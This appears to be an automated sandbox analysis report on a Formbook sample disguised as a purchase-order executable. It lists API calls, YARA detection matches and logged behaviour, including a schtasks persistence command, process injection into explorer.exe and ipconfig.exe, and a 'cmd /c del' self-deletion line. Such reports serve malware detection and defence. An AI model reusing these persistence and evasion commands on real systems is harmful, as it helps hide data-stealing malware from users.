Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034996E0 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_034996E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499540 NtReadFile,LdrInitializeThunk,	13_2_03499540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499910 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_03499910
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034995D0 NtClose,LdrInitializeThunk,	13_2_034995D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034999A0 NtCreateSection,LdrInitializeThunk,	13_2_034999A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499840 NtDelayExecution,LdrInitializeThunk,	13_2_03499840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499860 NtQuerySystemInformation,LdrInitializeThunk,	13_2_03499860
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499760 NtOpenProcess,	13_2_03499760
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499770 NtSetInformationFile,	13_2_03499770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0349A770 NtOpenThread,	13_2_0349A770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499B00 NtSetValueKey,	13_2_03499B00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0349A710 NtOpenProcessToken,	13_2_0349A710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499730 NtQueryVirtualMemory,	13_2_03499730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034997A0 NtUnmapViewOfSection,	13_2_034997A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0349A3B0 NtGetContextThread,	13_2_0349A3B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499650 NtQueryValueKey,	13_2_03499650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499660 NtAllocateVirtualMemory,	13_2_03499660
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499670 NtQueryInformationProcess,	13_2_03499670
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499A00 NtProtectVirtualMemory,	13_2_03499A00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499610 NtEnumerateValueKey,	13_2_03499610
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499A10 NtQuerySection,	13_2_03499A10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499A20 NtResumeThread,	13_2_03499A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499A80 NtOpenDirectoryObject,	13_2_03499A80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499950 NtQueueApcThread,	13_2_03499950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499560 NtWriteFile,	13_2_03499560
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499520 NtWaitForSingleObject,	13_2_03499520
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0349AD30 NtSetContextThread,	13_2_0349AD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034999D0 NtCreateProcessEx,	13_2_034999D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034995F0 NtQueryInformationFile,	13_2_034995F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0349B040 NtSuspendThread,	13_2_0349B040
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03499820 NtEnumerateKey,	13_2_03499820
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034998F0 NtReadVirtualMemory,	13_2_034998F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034998A0 NtWriteVirtualMemory,	13_2_034998A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009C9D50 NtCreateFile,	13_2_009C9D50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009C9E80 NtClose,	13_2_009C9E80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009C9E00 NtReadFile,	13_2_009C9E00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009C9D4A NtCreateFile,	13_2_009C9D4A

Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_012821F8	0_2_012821F8
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_012830D0	0_2_012830D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01281851	0_2_01281851
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01280FF8	0_2_01280FF8
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_012851E0	0_2_012851E0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_012851D0	0_2_012851D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01283063	0_2_01283063
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01281292	0_2_01281292
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01285420	0_2_01285420
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01285430	0_2_01285430
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_012804D0	0_2_012804D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_012856A8	0_2_012856A8
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01285698	0_2_01285698
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01285840	0_2_01285840
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01283FA8	0_2_01283FA8
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01283F99	0_2_01283F99
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01280FD4	0_2_01280FD4
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01284E60	0_2_01284E60
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_09AB9DD0	0_2_09AB9DD0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_09AB6100	0_2_09AB6100
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_09ABB098	0_2_09ABB098
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_09AB0040	0_2_09AB0040
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00401026	9_2_00401026
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0041D3FD	9_2_0041D3FD
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0041E601	9_2_0041E601
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00409E30	9_2_00409E30
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0041DFA7	9_2_0041DFA7
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180F900	9_2_0180F900
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01824120	9_2_01824120
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181B090	9_2_0181B090
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018320A0	9_2_018320A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D20A8	9_2_018D20A8
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D28EC	9_2_018D28EC
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C1002	9_2_018C1002
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183EBB0	9_2_0183EBB0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CDBD2	9_2_018CDBD2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D2B28	9_2_018D2B28
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D22AE	9_2_018D22AE
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832581	9_2_01832581
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D25DD	9_2_018D25DD
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181D5E0	9_2_0181D5E0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D2D07	9_2_018D2D07
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01800D20	9_2_01800D20
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D1D55	9_2_018D1D55
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181841F	9_2_0181841F
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CD466	9_2_018CD466
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D1FF1	9_2_018D1FF1
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D2EF7	9_2_018D2EF7
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018CD616	9_2_018CD616
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01826E30	9_2_01826E30
Source: C:\Windows\explorer.exe	Code function: 10_2_04E0DA32	10_2_04E0DA32
Source: C:\Windows\explorer.exe	Code function: 10_2_04E05CEC	10_2_04E05CEC
Source: C:\Windows\explorer.exe	Code function: 10_2_04E05CF2	10_2_04E05CF2
Source: C:\Windows\explorer.exe	Code function: 10_2_04E0C862	10_2_04E0C862
Source: C:\Windows\explorer.exe	Code function: 10_2_04E04069	10_2_04E04069
Source: C:\Windows\explorer.exe	Code function: 10_2_04E10A6F	10_2_04E10A6F
Source: C:\Windows\explorer.exe	Code function: 10_2_04E04072	10_2_04E04072
Source: C:\Windows\explorer.exe	Code function: 10_2_04E08B22	10_2_04E08B22
Source: C:\Windows\explorer.exe	Code function: 10_2_04E0B132	10_2_04E0B132
Source: C:\Windows\explorer.exe	Code function: 10_2_04E10B0E	10_2_04E10B0E
Source: C:\Windows\explorer.exe	Code function: 10_2_04E08B1F	10_2_04E08B1F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03522B28	13_2_03522B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03521FF1	13_2_03521FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348EBB0	13_2_0348EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03476E30	13_2_03476E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03522EF7	13_2_03522EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_035222AE	13_2_035222AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03521D55	13_2_03521D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345F900	13_2_0345F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03522D07	13_2_03522D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03450D20	13_2_03450D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120	13_2_03474120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346D5E0	13_2_0346D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581	13_2_03482581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511002	13_2_03511002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346841F	13_2_0346841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B090	13_2_0346B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034820A0	13_2_034820A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_035220A8	13_2_035220A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009B2D90	13_2_009B2D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009CE601	13_2_009CE601
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009B9E30	13_2_009B9E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009B2FB0	13_2_009B2FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009CDFA7	13_2_009CDFA7

Source: C:\Users\user\Desktop\PO_210223.exe	Code function: String function: 0180B150 appears 35 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0345B150 appears 35 times

Source: PO_210223.exe	Binary or memory string: OriginalFilename vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000000.641235536.0000000000956000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.689224282.000000000B660000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.689224282.000000000B660000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.687139133.0000000009840000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.687388801.00000000099C0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.688279597.000000000B570000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameriched20.dllp( vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: k,\\StringFileInfo\\000004B0\\OriginalFilename vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs PO_210223.exe
Source: PO_210223.exe, 00000000.00000002.679711505.0000000001030000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO_210223.exe
Source: PO_210223.exe, 00000009.00000002.715919446.00000000016E7000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs PO_210223.exe
Source: PO_210223.exe, 00000009.00000000.673088328.0000000000CF6000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe
Source: PO_210223.exe, 00000009.00000002.716615748.0000000001A8F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO_210223.exe
Source: PO_210223.exe	Binary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe

Source: PO_210223.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@3/3

Source: C:\Users\user\Desktop\PO_210223.exe

File created: C:\Users\user\AppData\Roaming\kwqifureL.exe

Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe	Mutant created: \Sessions\1\BaseNamedObjects\kOfurgeHGWQSiueuJ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_01

Source: C:\Users\user\Desktop\PO_210223.exe

File created: C:\Users\user\AppData\Local\Temp\tmp33D2.tmp

Jump to behavior

Source: PO_210223.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO_210223.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: PO_210223.exe	Virustotal: Detection: 31%
Source: PO_210223.exe	ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\PO_210223.exe

File read: C:\Users\user\Desktop\PO_210223.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO_210223.exe 'C:\Users\user\Desktop\PO_210223.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe
Source: unknown	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO_210223.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'	Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO_210223.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO_210223.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ipconfig.pdb source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO_210223.exe, 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, ipconfig.exe, 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PO_210223.exe, ipconfig.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe

Unpacked PE file: 0.2.PO_210223.exe.890000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe

Unpacked PE file: 0.2.PO_210223.exe.890000.0.unpack

Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_0089423E push ebp; ret	0_2_0089423F
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_00893835 push cs; iretd	0_2_00893846
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_00894043 push edi; ret	0_2_00894047
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_00897272 push edx; iretd	0_2_008972B0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01286A7C push edi; iretd	0_2_01286A7E
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 0_2_01286A72 push edi; iretd	0_2_01286A74
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00409BAC push ebx; retf	9_2_00409BAF
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0041DD1B push eax; ret	9_2_0041DE9C
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0041CEF2 push eax; ret	9_2_0041CEF8
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0041CEFB push eax; ret	9_2_0041CF62
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0041CEA5 push eax; ret	9_2_0041CEF8
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0041CF5C push eax; ret	9_2_0041CF62
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00C320F3 pushad ; retf	9_2_00C320F4
